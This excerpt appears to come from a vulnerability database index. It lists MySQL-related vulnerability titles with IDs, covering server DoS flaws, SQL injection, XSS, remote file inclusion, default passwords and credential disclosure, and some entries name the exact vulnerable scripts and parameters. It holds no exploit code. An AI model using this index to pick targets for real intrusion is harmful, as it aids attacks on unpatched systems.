20759| [95337] Oracle MySQL Server XA Transactions Subcomponent Unspecified Remote DoS
20760| [95336] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
20761| [95335] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
20762| [95334] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue
20763| [95333] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
20764| [95332] Oracle MySQL Server Parser Subcomponent Unspecified Remote DoS
20765| [95331] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3801)
20766| [95330] Oracle MySQL Server Options Subcomponent Unspecified Remote DoS (2013-3808)
20767| [95329] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3796)
20768| [95328] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2013-3804)
20769| [95327] Oracle MySQL Server Prepared Statements Subcomponent Unspecified Remote DoS
20770| [95326] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
20771| [95325] Oracle MySQL Server Full Text Search Subcomponent Unspecified Remote DoS
20772| [95324] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3795)
20773| [95323] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-3793)
20774| [95322] Oracle MySQL Server Audit Log Subcomponent Unspecified Remote Issue
20775| [95321] Oracle MySQL Server MemCached Subcomponent Unspecified Remote Issue
20776| [95131] AutoMySQLBackup /usr/sbin/automysqlbackup Database Name Arbitrary Code Injection
20777| [94076] Debian Linux MySQL Server mysql-server-5.5.postinst Race Condition debian.cnf Plaintext Credential Local Disclosure
20778| [93505] Wireshark MySQL Dissector (packet-mysql.c) Malformed Packet Handling Infinite Loop Remote DoS
20779| [93174] MySQL Crafted Derived Table Handling DoS
20780| [92967] MySQL2JSON (mn_mysql2json) Extension for TYPO3 Unspecified SQL Injection
20781| [92950] MySQL Running START SLAVE Statement Process Listing Plaintext Local Password Disclosure
20782| [92485] Oracle MySQL Server Partition Subcomponent Unspecified Local DoS
20783| [92484] Oracle MySQL Server Locking Subcomponent Unspecified Remote DoS (2013-1506)
20784| [92483] Oracle MySQL Server Install Subcomponent Unspecified Local Issue
20785| [92482] Oracle MySQL Server Types Subcomponent Unspecified Remote DoS
20786| [92481] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2381)
20787| [92480] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1566)
20788| [92479] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-1511)
20789| [92478] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1567)
20790| [92477] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
20791| [92476] Oracle MySQL Server Replication Subcomponent Unspecified Remote DoS
20792| [92475] Oracle MySQL Server Partition Subcomponent Unspecified Remote DoS
20793| [92474] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS
20794| [92473] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-2389)
20795| [92472] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
20796| [92471] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1512)
20797| [92470] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-1544)
20798| [92469] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote Issue
20799| [92468] Oracle MySQL Server MemCached Subcomponent Unspecified Remote DoS
20800| [92467] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-2375)
20801| [92466] Oracle MySQL Server Privileges Subcomponent Unspecified Remote Issue (2013-1531)
20802| [92465] Oracle MySQL Server Server Subcomponent Unspecified Remote Issue
20803| [92464] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Issue
20804| [92463] Oracle MySQL Server Locking Subcomponent Unspecified Remote Issue (2013-1521)
20805| [92462] Oracle MySQL Server Data Manipulation Language Subcomponent Unspecified Remote DoS (2013-2395)
20806| [91536] Oracle MySQL yaSSL Unspecified Overflow (2012-0553)
20807| [91534] Oracle MySQL yaSSL Unspecified Overflow (2013-1492)
20808| [91415] MySQL Raw Geometry Object String Conversion Remote DoS
20809| [91108] Juju mysql Charm Install Script mysql.passwd MySQL Password Plaintext Local Disclosure
20810| [89970] Site Go /site-go/admin/extra/mysql/index.php idm Parameter Traversal Arbitrary File Access
20811| [89265] Oracle MySQL Server Server Privileges Subcomponent Unspecified Remote DoS
20812| [89264] Oracle MySQL Server Server Partition Subcomponent Unspecified Remote DoS
20813| [89263] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-0578)
20814| [89262] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-1705)
20815| [89261] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-0574)
20816| [89260] Oracle MySQL Server MyISAM Subcomponent Unspecified Remote DoS
20817| [89259] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2012-0572)
20818| [89258] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS (2013-0368)
20819| [89257] Oracle MySQL Server Server Locking Subcomponent Unspecified Remote DoS
20820| [89256] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-1702)
20821| [89255] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote Issue
20822| [89254] Oracle MySQL Server Server Replication Subcomponent Unspecified Local Issue
20823| [89253] Oracle MySQL Server Stored Procedure Subcomponent Unspecified Remote DoS
20824| [89252] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS
20825| [89251] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote DoS
20826| [89250] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
20827| [89042] ViciBox Server MySQL cron Service Default Credentials
20828| [88415] Oracle MySQL Server COM_CHANGE_USER Account Password Brute-Force Weakness
20829| [88118] Oracle MySQL Server FILE Privilege Database Privilege Escalation
20830| [88067] Oracle MySQL Server Authentication Error Message User Enumeration
20831| [88066] Oracle MySQL Server for Linux Access Rights Checking Routine Database Name Handling Stack Buffer Overflow
20832| [88065] Oracle MySQL Server COM_BINLOG_DUMP Invalid Data Handling DoS
20833| [88064] Oracle MySQL Server Multiple-Table DELETE Heap Buffer Overflow
20834| [87704] CodeIgniter MySQL / MySQLi Driver Database Client Multi-byte Character Set Unspecified SQL Injection
20835| [87507] Oracle MySQL Statement Logging Multiple Log Plaintext Local Password Disclosure
20836| [87501] Oracle MySQL optimizer_switch Malformed Value Processing Local DoS
20837| [87494] Oracle MySQL on Windows Field_new_decimal::store_value dbug_buff Variable Overflow DoS
20838| [87480] MySQL Malformed XML Comment Handling DoS
20839| [87466] MySQL SSL Certificate Revocation Weakness
20840| [87356] Oracle MySQL do_div_mod DIV Expression Handling Remote DoS
20841| [87355] Oracle MySQL handler::pushed_cond Table Cache Handling mysqld DoS
20842| [87354] Oracle MySQL Polygon Union / Intersection Spatial Operations DoS
20843| [86273] Oracle MySQL Server Server Installation Subcomponent Unspecified Local Information Disclosure
20844| [86272] Oracle MySQL Server Server Replication Subcomponent Unspecified Remote DoS
20845| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
20846| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
20847| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
20848| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
20849| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
20850| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
20851| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
20852| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
20853| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
20854| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
20855| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
20856| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
20857| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
20858| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
20859| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
20860| [84719] MySQLDumper index.php page Parameter XSS
20861| [84680] MySQL Squid Access Report access.log File Path XSS
20862| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
20863| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
20864| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
20865| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
20866| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
20867| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
20868| [83661] Oracle MySQL Unspecified Issue (59533)
20869| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
20870| [82803] Oracle MySQL Unspecified Issue (59387)
20871| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
20872| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
20873| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
20874| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
20875| [81614] MySQLDumper File Upload PHP Code Execution
20876| [81613] MySQLDumper main.php Multiple Function CSRF
20877| [81612] MySQLDumper restore.php filename Parameter XSS
20878| [81611] MySQLDumper sql.php Multiple Parameter XSS
20879| [81610] MySQLDumper install.php Multiple Parameter XSS
20880| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
20881| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
20882| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
20883| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
20884| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
20885| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
20886| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
20887| [81059] Oracle MySQL Server Multiple Unspecified Issues
20888| [79038] Webmin Process Listing MySQL Password Local Disclosure
20889| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
20890| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
20891| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
20892| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
20893| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
20894| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
20895| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
20896| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
20897| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
20898| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
20899| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
20900| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
20901| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
20902| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
20903| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
20904| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
20905| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
20906| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
20907| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
20908| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
20909| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
20910| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
20911| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
20912| [78375] Oracle MySQL Server Unspecified Local DoS
20913| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
20914| [78373] Oracle MySQL Server Unspecified Local Issue
20915| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
20916| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
20917| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
20918| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
20919| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
20920| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
20921| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
20922| [77040] DBD::mysqlPP Unspecified SQL Injection
20923| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
20924| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
20925| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
20926| [73387] Zend Framework PDO_MySql Character Set Security Bypass
20927| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
20928| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
20929| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
20930| [71368] Accellion File Transfer Appliance Weak MySQL root Password
20931| [70967] MySQL Eventum Admin User Creation CSRF
20932| [70966] MySQL Eventum preferences.php full_name Parameter XSS
20933| [70961] MySQL Eventum list.php Multiple Parameter XSS
20934| [70960] MySQL Eventum forgot_password.php URI XSS
20935| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
20936| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
20937| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
20938| [69395] MySQL Derived Table Grouping DoS
20939| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
20940| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
20941| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
20942| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
20943| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
20944| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
20945| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
20946| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
20947| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
20948| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
20949| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
20950| [68996] MySQL EXPLAIN EXTENDED Statement DoS
20951| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
20952| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
20953| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
20954| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
20955| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
20956| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
20957| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
20958| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
20959| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
20960| [67381] MySQL InnoDB Temporary Table Handling DoS
20961| [67380] MySQL BINLOG Statement Unspecified Argument DoS
20962| [67379] MySQL Multiple Operation NULL Argument Handling DoS
20963| [67378] MySQL Unique SET Column Join Statement Remote DoS
20964| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
20965| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
20966| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
20967| [66731] PHP Bundled MySQL Library Unspecified Issue
20968| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
20969| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
20970| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
20971| [65085] MySQL Enterprise Monitor Unspecified CSRF
20972| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
20973| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
20974| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
20975| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
20976| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
20977| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
20978| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
20979| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
20980| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
20981| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
20982| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
20983| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
20984| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
20985| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
20986| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
20987| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
20988| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
20989| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
20990| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
20991| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
20992| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
20993| [59907] MySQL on Windows bind-address Remote Connection Weakness
20994| [59906] MySQL on Windows Default Configuration Logging Weakness
20995| [59616] MySQL Hashed Password Weakness
20996| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
20997| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
20998| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
20999| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
21000| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
21001| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
21002| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
21003| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
21004| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
21005| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
21006| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
21007| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
21008| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
21009| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
21010| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
21011| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
21012| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
21013| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
21014| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
21015| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
21016| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
21017| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
21018| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
21019| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
21020| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
21021| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
21022| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
21023| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
21024| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
21025| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
21026| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
21027| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
21028| [52464] MySQL charset Column Truncation Weakness
21029| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
21030| [52378] Cisco ANM MySQL root Account Default Password
21031| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
21032| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
21033| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
21034| [50892] MySQL Calendar index.php username Parameter SQL Injection
21035| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
21036| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
21037| [48710] MySQL Command Line Client HTML Output XSS
21038| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
21039| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
21040| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
21041| [47789] mysql-lists Unspecified XSS
21042| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
21043| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
21044| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
21045| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
21046| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
21047| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
21048| [43179] MySQL Server BINLOG Statement Rights Checking Failure
21049| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
21050| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
21051| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
21052| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
21053| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
21054| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
21055| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
21056| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
21057| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
21058| [39279] PHP mysql_error() Function XSS
21059| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
21060| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
21061| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
21062| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
21063| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
21064| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
21065| [37782] MySQL Community Server External Table View Privilege Escalation
21066| [37781] MySQL ALTER TABLE Information Disclosure
21067| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
21068| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
21069| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
21070| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
21071| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
21072| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
21073| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
21074| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
21075| [36251] Associated Press (AP) Newspower Default MySQL root Password
21076| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
21077| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
21078| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
21079| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
21080| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
21081| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
21082| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
21083| [33974] MySQL information_schema Table Subselect Single-Row DoS
21084| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
21085| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
21086| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
21087| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
21088| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
21089| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
21090| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
21091| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
21092| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
21093| [32056] BTSaveMySql Direct Request Config File Disclosure
21094| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
21095| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
21096| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
21097| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
21098| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
21099| [29696] MySQLDumper sql.php db Parameter XSS
21100| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
21101| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
21102| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
21103| [28288] MySQL Instance_options::complete_initialization Function Overflow
21104| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
21105| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
21106| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
21107| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
21108| [28012] MySQL Case Sensitivity Unauthorized Database Creation
21109| [27919] MySQL VIEW Access information_schema.views Information Disclosure
21110| [27703] MySQL MERGE Table Privilege Persistence
21111| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
21112| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
21113| [27416] MySQL Server time.cc date_format Function Format String
21114| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
21115| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
21116| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
21117| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
21118| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
21119| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
21120| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
21121| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
21122| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
21123| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
21124| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
21125| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
21126| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
21127| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
21128| [25595] Apple Mac OS X MySQL Manager Blank root Password
21129| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
21130| [25227] MySQL COM_TABLE_DUMP Packet Overflow
21131| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
21132| [24245] Cholod Mysql Based Message Board Unspecified XSS
21133| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
21134| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
21135| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
21136| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
